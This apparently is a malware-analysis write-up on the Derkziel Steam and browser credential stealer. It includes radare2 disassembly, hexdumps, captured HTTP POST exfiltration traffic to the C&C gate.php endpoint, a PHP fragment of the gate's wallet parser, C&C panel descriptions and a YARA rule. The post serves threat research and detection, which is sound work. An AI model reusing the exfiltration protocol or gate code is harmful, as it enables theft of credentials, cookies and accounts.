Derkziel Software

Intro

What do we know about Derkziel? …not much yet, but the little we know looks like a joke. Derkziel Software was a totally unknown adversary to us, actually the first time we noticed it was sifting through [CyberCrime Tracker].

So why did we decide to analyze Derkziel?, hmm well to be totally honest, we had nothing better to do at 03:00 am.

enter image description here

We know, it doesn’t sound like a typical sexy malware tale… but anyway!

Sample Analysis

For static analysis we used [Radare2]. Now, we don’t want to make a whole post about radare2, it’s just that we use this framework because we are phun! people. There is plenty of documentationin their website as well as slide decks for[talks and workshops].

To get into matters, first we run rahash2. This is part of Radare2, with this tool we will hash one of our files.

$ rahash2 -a md5 derk/user0000036-601704015.tmp

derk/user0000036-601704015.tmp: 0x00000000-0x0007c1ff md5: 7525ef63c8e9346a3e897c8d91231a73

For the next step we use rabin2. This tool allows you to get all sort of useful information about ELF/PE/MZ and CLASS files in a simple way, we pipe to grep to filter the class. Easy. PE. We love PE files!

**$ rabin2 -I derk/user0000036-601704015.tmpgrep class**
class    PE32

Okay, so we want more info about the binary: again rabin2.

$ rabin2 -k '*' derk/user0000036-601704015.tmp

archs=0:0:x86:32
pe.canary=false
pe.highva=false
pe.aslr=false
pe.forceintegrity=false
pe.nx=false
pe.isolation=true
pe.seh=true
pe.bind=true
pe.appcontainer=false
pe.wdmdriver=false
pe.guardcf=false
pe.terminalserveraware=false
pe.bits=0x20

For extracting sections we use -S. Here we go!

$ rabin2 -S derk/user0000036-601704015.tmp

Sections
idx=00 vaddr=0x00401000 paddr=0x00000400 sz=403968 vsz=403628 perm=m-r-x name=.text
idx=01 vaddr=0x00464000 paddr=0x00062e00 sz=512 vsz=280 perm=m-r-x name=.itext
idx=02 vaddr=0x00465000 paddr=0x00063000 sz=38400 vsz=38004 perm=m-rw- name=.data
idx=03 vaddr=0x0046f000 paddr=0x0006c600 sz=0 vsz=12532 perm=m-rw- name=.bss
idx=04 vaddr=0x00473000 paddr=0x0006c600 sz=5632 vsz=5382 perm=m-rw- name=.idata
idx=05 vaddr=0x00475000 paddr=0x0006dc00 sz=0 vsz=8 perm=m-rw- name=.tls
idx=06 vaddr=0x00476000 paddr=0x0006dc00 sz=512 vsz=24 perm=m-r-- name=.rdata
idx=07 vaddr=0x00477000 paddr=0x0006de00 sz=13312 vsz=13216 perm=m-r-- name=.reloc
idx=08 vaddr=0x0047b000 paddr=0x00071200 sz=45056 vsz=45044 perm=m-r-- name=.rsrc

Alright, so now we want to compare two samples to see differences in the offsets and other parts between the binaries. It will also help to see some other things!. Radiff2 is your friend.

**$ radiff2 -x derk/user0000036-601704015.tmp derk/user0000001-868286468.tmpgrep -v ‘ ! ‘ **
offset      0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF    0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x0007bc60  ff0000000b6465726b7a69656c2e7375 .....derkziel.su   ff000000146675636b696e67796f7572 .....fuckingyour
0x0007bc70  707730000000000000000000000090fa pw0.............   7369737465722e7275000000000090fa sister.ru.......
0x0007bc80  5f030000000000000000c89398000200 _...............   6e030000000000000000509598000200 n.........P.....
0x0007bcf0  000000d17674c8939800000000000000 ....vt..........   000000d1767450959800000000000000 ....vtP.........
0x0007bd20  0100e0fa5f031c000000e0fa5f031c00 ...._......._...   0100e0fa6e031c000000e0fa6e031c00 ....n.......n...
0x0007bd30  0000496111bc0d000000a0f69800259b ..Ia..........%.   0000496120bc0c00000020f89800259b ..Ia ..... ...%.
0x0007bd70  303030303033362f676174652e706870 0000036/gate.php   303030303030312f676174652e706870 0000001/gate.php
0x0007bda0  5f030000000000000000000000000100 _...............   6e030000000000000000000000000100 n...............
0x0007bdd0  00009003000001000000000000001002 ................   0000f803000001000000000000001002 ................
0x0007be00  000008fb5f03496111bc50fa5f034113 ...._.Ia..P._.A.   000008fb6e03496120bc50fa6e034113 ....n.Ia .P.n.A.
0x0007be10  7474ccfb5f034113747411073dcbfeff tt.._.A.tt..=...   7474ccfb6e034113747411073dcbfeff tt..n.A.tt..=...
0x0007be20  ffffdcfb5f0326752775000000001cfc ...._.&u'u......   ffffdcfb6e0326752775000000001cfc ....n.&u'u......
0x0007be30  5f03000000000000000000000000c0fb _...............   6e03000000000000000000000000c0fb n...............
0x0007be40  5f0363a641bd7c5161001cfc5f03feff _.c.A.|Qa..._...   6e0363a670bd7c5161001cfc6e03feff n.c.p.|Qa...n...
0x0007be50  ffff368502bfcda90a77282dba00f447 ..6......w(-...G   ffff368533bfcda90a77d02fba00d44c ..6.3....w./...L
0x0007be60  980002000b636f6e74726f6c2e657865 .....control.exe   980002000b737663686f73742e657865 .....svchost.exe
0x0007be70  0c770cfc5f0341137474918b3dcbfeff .w.._.A.tt..=...   0c770cfc6e0341137474918b3dcbfeff .w..n.A.tt..=...
0x0007be80  ffff549ab2000100000001000008ccfb ..T.............   ffff2c81b2000100000001000008ccfb ..,.............
0x0007be90  5f038c35b100010000006cffb2000100 _..5......l.....   6e032c38b100010000001c01b3000100 n.,8............
0x0007beb0  5f03000000000e0000008e35b1000e00 _..........5....   6e03000000000e0000002e38b1000e00 n..........8....
0x0007bf30  0000b04ef362990af78490fc5f03aab3 ...N.b......_...   0000b04ef36281894e9190fc6e03aab3 ...N.b..N...n...
0x0007bf90  12000000000060e2b30078fd5f03a406 ......`...x._...   120000000000c0e2b30078fd6e03a406 ..........x.n...
0x0007bff0  40000e5440006100000008b6b000d0fd @[email protected]   400024fd6e0359b540000e544000d0fd @[email protected]@...
0x0007c000  5f03166740001c93400018000000e404 [email protected][email protected]   6e03166740001c93400022000000e404 [email protected]@.".....
0x0007c010  00000b0000007f954000d0fd5f030b00 [email protected]_...   0000140000007f954000d0fd6e031400 [email protected]
0x0007c020  0000d0fd5f0358fd5f03719d40004357 [email protected]   0000d0fd6e0358fd6e03719d4000e404 [email protected]
0x0007c030  40000200000080fd5f03326740002a94 @[email protected]*.   0000d800000080fd6e03326740002a94 [email protected]*.
0x0007c040  4000ad0000000c00000064aa74006caa @.........d.t.l.   4000d80000001500000064aa74006caa @.........d.t.l.
0x0007c060  0000000000005041263d4f38c28237b8 ......PA&=O8..7.   0000000001015041263d4f38c28237b8 ......PA&=O8..7.

Oops, does that look like a URL?!?! So, it looks like the only thing that changes is the URL that the sample connects to and the process name, which are hardcoded inside the binary at offsets 0x0007bc60 and 0x0007be65

[0x00000000]> s 0x07bc65

[0x0007bc60]> x 64

offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x0007bc65  6465 726b 7a69 656c 2e73 7570 7730 0000  derkziel.supw0..
0x0007bc75  0000 0000 0000 0000 0090 fa5f 0300 0000  ..........._....
0x0007bc85  0000 0000 00c8 9398 0002 0000 0007 0000  ................
0x0007bc95  0000 0000 0000 0000 0038 0000 0000 0000  .........8......

[0x00000000]> s 0x07be65

[0x0007be65]> x 64

offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x0007be65  636f 6e74 726f 6c2e 6578 650c 770c fc5f  control.exe.w.._
0x0007be75  0341 1374 7491 8b3d cbfe ffff ff54 9ab2  .A.tt..=.....T..
0x0007be85  0001 0000 0001 0000 08cc fb5f 038c 35b1  ..........._..5.
0x0007be95  0001 0000 006c ffb2 0001 0000 002c 21b6  .....l.......,!.

So it looks like it is. So let’s look for this offset inside the binary.

Now we are going to check more static parts of the main sample, for example, the entrypoints

$ rabin2 -e derk/user0000036-601704015.tmp

[source,c]

[Entrypoints] vaddr=0x004640e4 paddr=0x00062ee4 baddr=0x00400000 laddr=0x00000000

1 entrypoints

Well now we have some basic information let’s go take a look inside of main sample.

$r2 derk/user0000036-601704015.tmp

… now we want to know what libraries they use.

[0x004640e4]> il

Linked libraries
oleaut32.dll
user32.dll
kernel32.dll
gdi32.dll
advapi32.dll
shfolder.dll
shell32.dll
wsock32.dll
comctl32.dll
msvcrt.dll
crypt32.dll

11 libraries

Now we are going to run check the imports the sample uses. iiq to check the imports.

[0x004640e4]> iiq

oleaut32.dll_SysFreeString
oleaut32.dll_SysReAllocStringLen
oleaut32.dll_SysAllocStringLen
user32.dll_MessageBoxA
kernel32.dll_Sleep
kernel32.dll_VirtualFree
kernel32.dll_VirtualAlloc
kernel32.dll_VirtualQuery
kernel32.dll_GetSystemInfo
kernel32.dll_GetVersion
kernel32.dll_SetThreadLocale
kernel32.dll_WideCharToMultiByte
kernel32.dll_MultiByteToWideChar
kernel32.dll_GetACP
kernel32.dll_GetStartupInfoW
kernel32.dll_GetProcAddress
kernel32.dll_GetModuleHandleW
kernel32.dll_GetModuleFileNameW
kernel32.dll_GetCommandLineW
kernel32.dll_FreeLibrary
kernel32.dll_UnhandledExceptionFilter
kernel32.dll_RtlUnwind
kernel32.dll_RaiseException
kernel32.dll_ExitProcess
kernel32.dll_GetCurrentThreadId
kernel32.dll_CreateThread
kernel32.dll_DeleteCriticalSection
kernel32.dll_InitializeCriticalSection
kernel32.dll_WriteFile
kernel32.dll_GetStdHandle
kernel32.dll_CloseHandle
kernel32.dll_GetProcAddress
kernel32.dll_RaiseException
kernel32.dll_LoadLibraryA
kernel32.dll_GetLastError
kernel32.dll_TlsSetValue
kernel32.dll_TlsGetValue
kernel32.dll_LocalFree
kernel32.dll_LocalAlloc
kernel32.dll_GetModuleHandleW
kernel32.dll_FreeLibrary
user32.dll_CreateWindowExW
user32.dll_UnregisterClassW
user32.dll_TranslateMessage
user32.dll_ToUnicodeEx
user32.dll_SystemParametersInfoW
user32.dll_ShowWindow
user32.dll_SetWindowPos
user32.dll_SendMessageW
user32.dll_RegisterClassW
user32.dll_OpenClipboard
user32.dll_MapVirtualKeyExW
user32.dll_LoadCursorW
user32.dll_LoadBitmapW
user32.dll_IsWindow
user32.dll_GetWindowThreadProcessId
user32.dll_GetWindowTextW
user32.dll_GetWindowRect
user32.dll_GetSystemMetrics
user32.dll_GetMessageW
user32.dll_GetKeyboardState
user32.dll_GetKeyboardLayout
user32.dll_GetKeyState
user32.dll_GetKeyNameTextA
user32.dll_GetForegroundWindow
user32.dll_GetClipboardData
user32.dll_GetClassNameW
user32.dll_GetAsyncKeyState
user32.dll_FindWindowA
user32.dll_EnumDisplayDevicesW
user32.dll_DispatchMessageW
user32.dll_DefWindowProcW
user32.dll_CloseClipboard
gdi32.dll_DeleteObject
gdi32.dll_CreateFontW
kernel32.dll_lstrlenA
kernel32.dll_WriteFile
kernel32.dll_WideCharToMultiByte
kernel32.dll_WaitForSingleObject
kernel32.dll_VerLanguageNameA
kernel32.dll_UnmapViewOfFile
kernel32.dll_UnlockFileEx
kernel32.dll_UnlockFile
kernel32.dll_TerminateProcess
kernel32.dll_SystemTimeToFileTime
kernel32.dll_Sleep
kernel32.dll_SetFilePointer
kernel32.dll_SetEndOfFile
kernel32.dll_ReadFile
kernel32.dll_QueryPerformanceCounter
kernel32.dll_OutputDebugStringA
kernel32.dll_OutputDebugStringW
kernel32.dll_OpenProcess
kernel32.dll_MultiByteToWideChar
kernel32.dll_MapViewOfFile
kernel32.dll_LockResource
kernel32.dll_LockFileEx
kernel32.dll_LockFile
kernel32.dll_LocalFree
kernel32.dll_LoadResource
kernel32.dll_LoadLibraryA
kernel32.dll_LoadLibraryW
kernel32.dll_LeaveCriticalSection
kernel32.dll_InitializeCriticalSection
kernel32.dll_HeapValidate
kernel32.dll_HeapSize
kernel32.dll_HeapReAlloc
kernel32.dll_HeapFree
kernel32.dll_HeapDestroy
kernel32.dll_HeapCreate
kernel32.dll_HeapAlloc
kernel32.dll_GlobalUnlock
kernel32.dll_GlobalSize
kernel32.dll_GlobalLock
kernel32.dll_GetVolumeInformationW
kernel32.dll_GetVersionExA
kernel32.dll_GetVersionExW
kernel32.dll_GetTickCount
kernel32.dll_GetTempPathA
kernel32.dll_GetTempPathW
kernel32.dll_GetSystemTimeAsFileTime
kernel32.dll_GetSystemTime
kernel32.dll_GetSystemInfo
kernel32.dll_GetSystemDefaultLangID
kernel32.dll_GetProcessHeap
kernel32.dll_GetProcAddress
kernel32.dll_GetModuleHandleW
kernel32.dll_GetLastError
kernel32.dll_GetFullPathNameA
kernel32.dll_GetFullPathNameW
kernel32.dll_GetFileSize
kernel32.dll_GetFileAttributesExW
kernel32.dll_GetFileAttributesA
kernel32.dll_GetFileAttributesW
kernel32.dll_GetDiskFreeSpaceA
kernel32.dll_GetDiskFreeSpaceW
kernel32.dll_GetCurrentProcessId
kernel32.dll_GetCurrentProcess
kernel32.dll_GetComputerNameW
kernel32.dll_InterlockedCompareExchange
kernel32.dll_FreeLibrary
kernel32.dll_FormatMessageA
kernel32.dll_FormatMessageW
kernel32.dll_FlushFileBuffers
kernel32.dll_FindResourceW
kernel32.dll_FindNextFileA
kernel32.dll_FindNextFileW
kernel32.dll_FindFirstFileA
kernel32.dll_FindFirstFileW
kernel32.dll_FindClose
kernel32.dll_ExitProcess
kernel32.dll_EnterCriticalSection
kernel32.dll_DeleteFileA
kernel32.dll_DeleteFileW
kernel32.dll_DeleteCriticalSection
kernel32.dll_CreateMutexW
kernel32.dll_CreateFileMappingA
kernel32.dll_CreateFileMappingW
kernel32.dll_CreateFileA
kernel32.dll_CreateFileW
kernel32.dll_CopyFileA
kernel32.dll_CloseHandle
kernel32.dll_AreFileApisANSI
advapi32.dll_RegSetValueExW
advapi32.dll_RegQueryValueExW
advapi32.dll_RegOpenKeyExW
advapi32.dll_RegOpenKeyW
advapi32.dll_RegCreateKeyExW
advapi32.dll_RegCloseKey
advapi32.dll_OpenProcessToken
advapi32.dll_GetUserNameW
SHFolder.dll_SHGetFolderPathW
shell32.dll_ShellExecuteW
wsock32.dll_WSACleanup
wsock32.dll_WSAStartup
wsock32.dll_gethostbyname
wsock32.dll_socket
wsock32.dll_send
wsock32.dll_recv
wsock32.dll_inet_ntoa
wsock32.dll_inet_addr
wsock32.dll_htons
wsock32.dll_connect
wsock32.dll_closesocket
comctl32.dll_InitCommonControls
msvcrt.dll__ftol
msvcrt.dll_memcpy
msvcrt.dll_memcmp
msvcrt.dll_memmove
msvcrt.dll_memset
msvcrt.dll_localtime
crypt32.dll_CryptUnprotectData

The entry looks like this:

[0x004641e4]> pdf
╒ (fcn) entry0 284
│           0x004640e4      55             push ebp
│           0x004640e5      8bec           mov ebp, esp
│           0x004640e7      83c4f0         add esp, -0x10
│           0x004640ea      b8441d4600     mov eax, 0x461d44
│           0x004640ef      e81410faff     call fcn.00405108
│           0x004640f4      b8e3040000     mov eax, 0x4e3
│           0x004640f9      e8660efaff     call fcn.00404f64
│           0x004640fe      e85133faff     call fcn.send_system_data   ; Extract config and get system info
│           0x00464103      e834dbffff     call fcn.main_stealer       ; Main stealer. Sends info to CnC
│           0x00464108      e89b30faff     call fcn.check_presence     ; Check if sample is running and present on autorun
│           0x0046410d      e86255faff     call fcn.keylogger          ; Install keylogger, steal Steam data
│           0x00464112      e895f7f9ff     call fcn.004038ac
│           0x00464117      90             nop

If we analyze the call at 0x004640fe (fcn.main_stealer), we find this nested call:

0x00461c59 e842ffffff call fcn.00461ba0

That function is responsible of executing the payload that gets information from the system, logins, cookies and steam information:

[0x00461ba0]> pdf @ 0x00461ba0

            ;-- fcn.steal_and_send:
╒ (fcn) fcn.00461ba0 126
│           ; var int local_1      @ ebp-0x4
│           ; var int local_2      @ ebp-0x8
│           ; var int local_3      @ ebp-0xc
│           ; var int local_4      @ ebp-0x10
│           ; var int local_5      @ ebp-0x14
│           ; CALL XREF from 0x00461c59 (fcn.00461ba0)
│           0x00461ba0      55             push ebp
│           0x00461ba1      8bec           mov ebp, esp
│           0x00461ba3      33c9           xor ecx, ecx
│           0x00461ba5      51             push ecx
│           0x00461ba6      51             push ecx
│           0x00461ba7      51             push ecx
│           0x00461ba8      51             push ecx
│           0x00461ba9      51             push ecx
│           0x00461baa      53             push ebx
│           0x00461bab      8bd8           mov ebx, eax
│           0x00461bad      33c0           xor eax, eax
│           0x00461baf      55             push ebp
│           0x00461bb0      681e1c4600     push 0x461c1e
│           0x00461bb5      64ff30         push dword fs:[eax]
│           0x00461bb8      648920         mov dword fs:[eax], esp
│           0x00461bbb      68381c4600     push 0x461c38
│           0x00461bc0      8d45fc         lea eax, [ebp-local_1]
│           0x00461bc3      e8e851faff     call fcn.get_environment_info
│           0x00461bc8      ff75fc         push dword [ebp-local_1]
│           0x00461bcb      8d45f8         lea eax, [ebp-local_2]
│           0x00461bce      e801b8faff     call fcn.get_browser_logins
│           0x00461bd3      ff75f8         push dword [ebp-local_2]
│           0x00461bd6      8d45f4         lea eax, [ebp-local_3]
│           0x00461bd9      e8d66cfaff     call fcn.get_steam_data
│           0x00461bde      ff75f4         push dword [ebp-local_3]
│           0x00461be1      8d45f0         lea eax, [ebp-local_4]
│           0x00461be4      e84f84faff     call fcn.get_video_info
│           0x00461be9      ff75f0         push dword [ebp-local_4]
│           0x00461bec      8d45ec         lea eax, [ebp-local_5]
│           0x00461bef      e808b9faff     call fcn.get_browser_cookies
│           0x00461bf4      ff75ec         push dword [ebp-local_5]
│           0x00461bf7      8bc3           mov eax, ebx
│           0x00461bf9      ba06000000     mov edx, 6
│           0x00461bfe      e82926faff     call fcn.0040422c
│           0x00461c03      33c0           xor eax, eax
│           0x00461c05      5a             pop edx
│           0x00461c06      59             pop ecx
│           0x00461c07      59             pop ecx
│           0x00461c08      648910         mov dword fs:[eax], edx
│           0x00461c0b      68251c4600     push 0x461c25
│           ; JMP XREF from 0x00461c23 (fcn.00461ba0)
│           0x00461c10      8d45ec         lea eax, [ebp-local_5]
│           0x00461c13      ba05000000     mov edx, 5
│           0x00461c18      e8cf1ffaff     call fcn.00403bec
╘           0x00461c1d      c3             ret

When this function returns, the sample sends the info to the C&C.

Communication Analysis

Until now, we have detected two versions of Derkziel (1.0 and 1.1). The payloads belong to version 1.1.

The first communication from the sample sends information about the system in which it is running:

hxxp://fuckingyoursister[.]ru/admin/user0000002/gate.php

POST /admin/user0000002/gate.php HTTP/1.1
Host: fuckingyoursister.ru
User-Agent: Uploador
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------282861610524488
Connection: close
Content-Length: 660
-----------------------------282861610524488
Content-Disposition: form-data; name="data"; filename="derkziel.txt"
Content-Type: application/octet-stream



{#!DRZ!}0000000{!DRZ!#}MLWRE-VM{!}DRZ{!}Sarah Connor{!}DRZ{!}Windows 7 Ultimate{!}DRZ{!}64{!}DRZ{!}1{!}DRZ{!}-1851432336{!}DRZ{!}{#!DRZ!}0000022{!DRZ!#}TGFuZ3VhZ2U6IEVuZ2xpc2ggKFVuaXRlZCBTdGF0ZXMpDQpSZXNvbHV0aW9uOiAxMDI0eDc2OA0KVXB0aW1lOiAwIERheXMgMCBIb3VyIDcgTWludXRlcyAxMiBTZWNvbmRzDQpWaWRlbyBDYXJkOiBTdGFuZGFyZCBWR0EgR3JhcGhpY3MgQWRhcHRlcg0KUkRQREQgQ2hhaW5lZCBERA0KUkRQIEVuY29kZXIgTWlycm9yIERyaXZlcg0KUkRQIFJlZmxlY3RvciBEaXNwbGF5IERyaXZlcg0K
-----------------------------282861610524488--

Fields are surrounded by {#!DRZ!} and {#!DRZ!#} except the last one which contains information about the system. The first parameter (0000000) is parsed by gate.php and mapped to different functions. These constants can be found inside the sample and gives a hint as to the different types of information that the sample steals.

0000000 System Info
00000001 Google Chrome
00000002 Yandex Browser
00000003 Nichrome
00000004 Comodo Dragon
00000005 RockMelt
00000006 Epic
00000007 Opera
00000008 Chromium
00000009 CoolNovo
0000010 Baidu
0000011 Sleipnir
0000012 Orbitum
0000013 Uran
0000014 Qip Surf
0000015 Amigo
0000016 Mozilla Firefox
0000017 Steam
0000018 Browser Cookies
0000019 Steam Logger
0000020 Skype Logger
0000021 Steam SSFN
0000022 Full System Information
0000023 Bitcoin recursive
0000024 Titan
0000025 Coowon


[0x100001058]> ?b64- TGFuZ3VhZ2U6IEVuZ2xpc2ggKFVuaXRlZCBTdGF0ZXMpDQpSZXNvbHV0aW9uOiAxMDI0eDc2OA0KVXB0aW1lOiAwIERheXMgMCBIb3VyIDcgTWludXRlcyAxMiBTZWNvbmRzDQpWaWRlbyBDYXJkOiBTdGFuZGFyZCBWR0EgR3JhcGhpY3MgQWRhcHRlcg0KUkRQREQgQ2hhaW5lZCBERA0KUkRQIEVuY29kZXIgTWlycm9yIERyaXZlcg0KUkRQIFJlZmxlY3RvciBEaXNwbGF5IERyaXZlcg0K

Language: English (United States)
Resolution: 1024x768
Uptime: 0 Days 0 Hour 7 Minutes 12 Seconds
Video Card: Standard VGA Graphics Adapter
RDPDD Chained DD
RDP Encoder Mirror Driver
RDP Reflector Display Driver

Derkziel Version 1.0 used base64 for encoding the payload. This version use base64 too but just for sending some information. On version 1.0 it was encoded inside the encoded payload.

After this, Derkziel sends the cookies obtained from different browsers. In this case, this was stolen from Chrome:

enter code herePOST /admin/user0000002/gate.php HTTP/1.1 Host: fuckingyoursister.ru User-Agent: Uploador Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Content-Type: multipart/form-data; boundary=—————————282861610524488 Connection: close Content-Length: 2133

-----------------------------282861610524488
Content-Disposition: form-data; name="data"; filename="derkziel.txt"
Content-Type: application/octet-stream


{#!DRZ!}0000000{!DRZ!#}MLWRE-VM{!}DRZ{!}Sarah Connor{!}DRZ{!}Windows 7 Ultimate{!}DRZ{!}64{!}DRZ{!}1{!}DRZ{!}-1617007100{!}DRZ{!}{#!DRZ!}0000022{!DRZ!#}TGFuZ3VhZ2U6IEVuZ2xpc2ggKFVuaXRlZCBTdGF0ZXMpDQpSZXNvbHV0aW9uOiAxNDQweDgzMA0KVXB0aW1lOiAwIERheXMgNCBIb3VyIDM4IE1pbnV0ZXMgNTkgU2Vjb25kcw0KVmlkZW8gQ2FyZDogVmlydHVhbEJveCBHcmFwaGljcyBBZGFwdGVyDQpSRFBERCBDaGFpbmVkIEREDQpSRFAgRW5jb2RlciBNaXJyb3IgRHJpdmVyDQpSRFAgUmVmbGVjdG9yIERpc3BsYXkgRHJpdmVyDQo={#!DRZ!}0000018{!DRZ!#}<filedata>  {
    "domain": ".youtube.com",
    "hostOnly": false,
    "name": "PREF",
    "path": "/",
    "session": false,
    "value": "f1=50000000"
  },
  {
    "domain": ".youtube.com",
    "hostOnly": false,
    "name": "VISITOR_INFO1_LIVE",
    "path": "/",
    "session": false,
    "value": "LlKscMaIefE"
  },
<!filedata>
-----------------------------282861610524488--

During the analysis, we found that the gate has a parser to get information about bitcoin wallets, although that functionality seems missing in the analyzed samples.

function module_rec_bitcoins($report_id, $report_unique_id, $import_time, $module_name, $source_data)

 {
  while (strpos($source_data, "<-----!FILE!----->") == true)
  {
  $wallet_module = ParsXML($source_data,'#bcname#=','#!bcname!#');
  $wallet_address = ParsXML($source_data,'#waddress#=','#!waddress!#');
  $filename = ParsXML($source_data,'#filename#=','#!filename!#');
  $filedata = ParsXML($source_data,'#filedata#=', '#!filedata!#');
  $source_data =substr_replace($source_data, "", strpos($source_data, "<-----!FILE!----->"), strlen("<-----!FILE!----->"));
  $source_data =substr_replace($source_data, "", strpos($source_data, "#filename#="), strlen("#filename#="));
  $source_data =substr_replace($source_data, "", strpos($source_data, "#filedata#="), strlen("#filedata#="));
  $source_data =substr_replace($source_data, "", strpos($source_data, "#bcname#="), strlen("#bcname#="));
  $source_data =substr_replace($source_data, "", strpos($source_data, "#waddress#="), strlen("#waddress#="));
  AddFileToWallet($report_id, $report_unique_id, $import_time, $wallet_module, $wallet_address, $filename, $filedata);
  $filename = "";
  $filedata = "";
  }
 }

C&C

Derkziel command and control, looks like tipical C&C Dashboard, this part is just to show you the look and feel inside the C&C. enter image description here It’s interesting to note that each time you want to login to the C&C, the background image changes for new one. They have lot of cool backgrounds! Anyway let’s check inside….

enter image description here

The main view shows you all the bots infected and reporting to the C&C. This is just a quick overview of the number of computers infected.

enter image description here

It also has a detailed view with all infected computers that allows to add comments for each infected system

enter image description here

As you can see the botmaster added comments into each infected computer. In most of cases he adds Steam Games balances or cash.

Inside each infected computer report we can see a detailed report with all features of the malware.

enter image description here Basically the main target for Derkziel Malware are Steam accounts. You can see they have Steam keyloger and Steam Profile Downloader, althogh also they have a nice formgrabber for Internet Browsers.

We add just other capture with more user interaction:

enter image description here

And finally we want to show you the configuration side of the C&C:

enter image description here

The settings page allows you to change language. Available languages are English, Russian and Ukranian. And you can even upload your custom background!

The C&C has a internal builder to setup your own Malware file acording to your hosting settings.

Yara Signature

Finally with the main strings we create our own Yara signature:

Yara Signature


rule Derkziel

{
    meta:
        description = "Derkziel info stealer (Steam, Opera, Yandex, ...)"
        author = "The Malware Hunter"
        yaraexchange = "No distribution without author's consent"
        filetype = "pe"
        date = "2015-11"
        md5 = "f5956953b7a4acab2e6fa478c0015972"
        site = "https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972"
        reference = "https://bhf.su/threads/137898/"
    strings:
        $drz = "{!}DRZ{!}"
        $ua = "User-Agent: Uploador"
        $steam = "SteamAppData.vdf"
        $login = "loginusers.vdf"
        $config = "config.vdf"
    condition:
        all of them}

enter code here

Testing our rule, of course, with Radare2 :]

[source,c] [0x004640e4]> yara3 add /tmp/derkziel.yar [0x004640e4]> yara3 list Derkziel [0x004640e4]> yara3 scan Derkziel [0x004640e4]>

Who’s Your Daddy???

Conclusions

As we saw, this threat is not a really challenging one. The samples analysed don’t use any kind of anti-{debugging,reversing,av} techniques and the number of features are low compared with other current threats. During the time we have been analyzing Derkziel we have detected a number of DNS changes, although the samples don’t use dynamic C&C resolution. This makes the sample unusable once the domain is down.

About the actor behind, we will leave it up to you to find this guy…

enter image description here

Happy Ending

**Samples analized **


6aa6dbb3d2a1a195bd621237bb65812d
a7ad5cea87287ce8e47d8ef08273e0f6
bd72ff73db2b52e303881cf6326d62e6
aa3d96db36b5680cf5107ac09c003067
2785dad301a4f1524e76af812a63bf99
7525ef63c8e9346a3e897c8d91231a73

PCAP for phun

[Download PCAP for analysis]

Back